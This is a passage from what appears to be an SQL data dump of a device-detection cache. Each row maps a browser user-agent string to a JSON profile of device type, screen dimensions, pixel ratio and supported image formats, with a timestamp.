Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679296484),('Mozilla/5.0 (Linux; Android 12; moto g(60)) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":984,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679300841),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 6.9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679314833),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G985F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1685783388),('Mozilla/5.0 (Linux; Android 12; SM-A326B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681411362),('Mozilla/5.0 (Linux; Android 12; EB2103) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1679519021),('HTC-ST7377/1.59 (67150) Opera/9.50 (Windows NT 5.1)','',1679997382),('Mozilla/5.0 (Linux; Android 12; 21091116AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1680162087),('Mozilla/5.0 (Linux; Android 10; ELS-NX9; HMSCore 6.10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1680241592),('Mozilla/5.0 (Linux; Android 2.*; Nexus One) AppleWebKit/* (KHTML, like Gecko) Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1680831061),('Mozilla/5.0 (Linux; Android 13; NE2213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1680377272),('Mozilla/5.0 (Linux; Android 11; SM-A505GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1680382726),('Mozilla/5.0 (Linux; Android 13; XQ-BT52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690448555),('Mozilla/5.0 (Linux; Android 13; 21091116UG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1692722029),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-T220) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1680775210),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1680982325),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G770F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681013617),('Mozilla/5.0 (Linux; Android 10; ELE-L29; HMSCore 6.10; GMSCore 23.12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681197171),('Mozilla/5.0 (Linux; Android 12; Redmi Note 9 Pro Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681439397),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A125F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1716040511),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-F721B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":880,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1707555347),('Mozilla/5.0 (Linux; Android 10; ART-L29; HMSCore 6.10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1681574688),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A137F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1721043018),('Mozilla/5.0 (Linux; Android 12; S42) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1682144232),('Mozilla/5.0 (Linux; Android 13; SM-N986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1682151291),('Mozilla/5.0 (Linux; Android 13; SM-A127F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690008184),('Mozilla/5.0 (Linux; Android 13; SM-G525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":339,\"screenHeight\":697,\"pixelRatio\":2.125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1682253388),('Mozilla/5.0 (Linux; Android 13; 2201123G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1682321717),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A127F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1746559627),('Mozilla/5.0 (Linux; Android 12; SM-T500) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1683260923),('Mozilla/5.0 (Linux; Android 11; IV2201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1682925228),('Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690006529),('Mozilla/5.0 (Linux; Android 12; RMX3363) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1683269286),('Mozilla/5.0 (iPhone 92; CPU iPhone OS 11 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":375,\"screenHeight\":812,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1683299704),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A145R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":385,\"screenHeight\":854,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1710158174),('Mozilla/5.0 (Linux; Android 12; CPH2205) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748112755),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.10; GMSCore 22.30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1683993045),('Mozilla/5.0 (iPad; CPU OS 16 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1707846832),('Mozilla/5.0 (Linux; Android 11; Nokia C20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1684208864),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G780F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708342472),('Mozilla/5.0 (Linux; Android 10; JNY-LX1; HMSCore 6.10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686405259),('Mozilla/5.0 (Linux; Android 11; CTR-LX1; HMSCore 6.10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1684654839),('Mozilla/5.0 (Linux; Android 11; M2010J19SI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1689863029),('Mozilla/5.0 (Linux; Android 13; SM-G715FN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1684783699),('Mozilla/5.0 (Linux; Android 1.*; SPH-M900) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1684803495),('Opera/9.80 (Android 2.*; Linux; Opera Mobi) Presto/2.7','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1684852458),('Mozilla/5.0 (Linux; Android 10; VOG-L29; HMSCore 6.10; GMSCore 23.16) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1685104232),('Mozilla/5.0 (X11; CentOS; Linux x86_64; rv:36.0) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1745809231),('Mozilla/5.0 (Linux; Android 10; PPA-LX2; HMSCore 6.10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686378644),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-A336B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690039443),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A236B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":857,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686472142),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-N986B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":882,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1685456233),('Mozilla/5.0 (Linux; Android 12; M1908C3JGG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686468482),('Mozilla/5.0 (Linux; Android 11; M1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686833574),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S906B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1705679815),('Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1704670621),('Mozilla/5.0 (Linux; Android 11; TFY-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":770,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690141528),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A526B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686725532),('Chrome (AppleWebKit/537.1; Chrome50.0; Windows NT 6.3) AppleWebKit/* (KHTML like Gecko) Chrome Safari/* Edge/14.14393','',1686786834),('Mozilla/5.0 (Linux; Android 13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile DuckDuckGo/5 Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1686984516),('Mozilla/5.0 (Linux; Android 13; Pixel 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1687121373),('Mozilla/5.0 (Linux; Android 12; SM-M317F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1687177212),('Opera/12.0(Windows NT 5.2)Presto/22.9','',1687358004),('Mozilla/5.0 (BlackBerry; BlackBerry 9850) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":480,\"screenHeight\":640,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1687361264),('Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)','',1687358134),('Mozilla/5.0 (Windows; MSIE 9.0; WIndows NT 9.0))','',1687358248),('Mozilla/4.0 (Compatible; MSIE 8.0; Windows NT 5.2; Trident/6.0)','',1687358301),('Mozilla/5.0 (Linux; Android 2.*) AppleWebKit/* (KHTML, like Gecko) Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":240,\"screenHeight\":320,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1687364291),('Mozilla/5.0 (Linux; Android 4.*; HTC Sensation) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1687360106),('Opera/12.80 (Windows NT 5.1) Presto/2.10','',1687360643),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A346B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1708114817),('Mozilla/5.0 (Linux; Android 13; 2210129SG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1687683214),('Mozilla/5.0 (iPhone; CPU iPhone OS 17 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1747841129),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S918B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1698523899),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A336B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1703762460),('Mozilla/5.0 (Windows; Windows CE) AppleWebKit/* (KHTML, like Gecko) Safari/*','',1688066902),('Opera/8.63.(Windows NT 5.01) Presto/2.9','',1688066907),('Mozilla/5.0 (compatible; MSIE 9.0; Windows CE; Trident/5.0)','',1688066955),('Opera/8.96.(Windows NT 5.2) Presto/2.9','',1688066963),('Mozilla/5.0 (iPad; CPU iPad OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688066972),('Mozilla/5.0 (Linux; Android 3.*) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1688066983),('Opera/8.83.(X11; Linux i686) Presto/2.9','',1688066992),('Mozilla/5.0 (iPad; CPU iPad OS 5 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688067057),('Opera/9.47.(X11; Linux x86_64; fur-IT) Presto/2.9','',1688067000),('Mozilla/5.0 (Android 2.*; Mobile) Firefox/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688067120),('Opera/8.97.(X11; Linux i686) Presto/2.9','',1688067008),('Opera/9.89.(X11; Linux i686) Presto/2.9','',1688067024),('Opera/9.85.(Windows 98) Presto/2.9','',1688067028),('Opera/9.67.(Windows NT 6.1) Presto/2.9','',1688067051),('Mozilla/5.0 (iPad; CPU iPad OS 14 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688067065),('Mozilla/5.0 (Linux; Android 2.*) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688067078),('Mozilla/5.0 (iPad; CPU iPad OS 10 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688067081),('Opera/8.88.(X11; Linux i686; quz-PE) Presto/2.9','',1688067086),('Mozilla/5.0 (iPod; CPU iPhone OS 4 like Mac OS X; doi-IN) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688067116),('Mozilla/5.0 (iPod; CPU iPhone OS 3 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":320,\"screenHeight\":568,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688067131),('Opera/9.77.(Windows NT 5.01) Presto/2.9','',1688067164),('Opera/8.26.(X11; Linux i686) Presto/2.9','',1688067225),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G980F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1692630828),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-G998B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":854,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1690308244),('Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-A725F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1707561539),('Mozilla/5.0 (Linux; Android 11; SM-T295) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1689873648),('Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G991U) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1688929477),('Mozilla/5.0 (Linux; Android 7.*; 17MB150WB) AppleWebKit/* (KHTML, like Gecko) Chrome 